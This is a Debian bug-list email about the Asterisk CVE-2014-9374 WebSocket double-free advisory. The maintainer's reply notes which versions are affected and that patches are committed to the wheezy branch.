On Mon, Dec 15, 2014 at 09:26:41PM +0100, Salvatore Bonaccorso wrote: > Source: asterisk > Version: 1:11.13.0~dfsg-1 > Severity: important > Tags: security upstream fixed-upstream > > Hi, > > the following vulnerability was published for asterisk. > > CVE-2014-9374[0]: > | Double free vulnerability in the WebSocket Server (res_http_websocket > | module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, > | and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 > | allows remote attackers to cause a denial of service (crash) by sending > | a zero length frame after a non-zero length frame. > > No description was found (try on a search engine) > > If you fix the vulnerability please also make sure to include the > CVE (Common Vulnerabilities & Exposures) id in your changelog entry. > > For further information see: > > [0] https://security-tracker.debian.org/tracker/CVE-2014-9374
Upstream's page: http://downloads.asterisk.org/pub/security/AST-2014-019.html 1.8 doesn't have websocket support and thus is not vulnrable. Patches for this and the previous issues is now finally commited to git (branch wheezy). Sadly I'll have to use t-p-u as Unstable has a Asterisk 13 due to my miscalculation. -- Tzafrir Cohen icq#16849755 jabber:tzafrir.co...@xorcom.com +972-50-7952406 mailto:tzafrir.co...@xorcom.com http://www.xorcom.com -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org